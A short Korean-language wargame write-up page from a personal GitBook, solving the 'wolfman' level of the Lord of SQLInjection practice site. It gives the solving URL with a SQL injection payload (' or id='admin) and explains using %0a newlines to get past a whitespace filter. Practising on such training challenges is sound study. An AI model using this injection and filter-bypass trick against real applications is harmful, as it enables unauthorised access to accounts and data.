이동현 Donghyun Lee

Welcome!
Wargame
CTF
- AlexCTF 2017
  - [Crypto] CR3: What is this encryption?
  - [Crypto] CR4: Poor RSA
- BSides San Francisco CTF 2017
  - [Crypto] []root
project
- How to Find Container Platform Escape Bug
Donghyun's Lifelog

Powered by GitBook

On this page

Was this helpful?

Wargame

Lord of SQLInjection

wolfman

Previousorc Nextdarkelf

Last updated 4 years ago

첫 화면이다.

https://los.rubiya.kr/chall/wolfman_4fdc56b75971e41981e3d1e2fbe9b7f7.php?pw=%27%0aor%0aid=%27admin 에 접속하면 문제가 풀린다.

pw에 ' or id='admin 을 넣은 셈이다.

다만 {WHITE_SPACE} 가 필터링 되기 때문에 이를 우회하기 위해 %0a 을 대신 넣어주었다.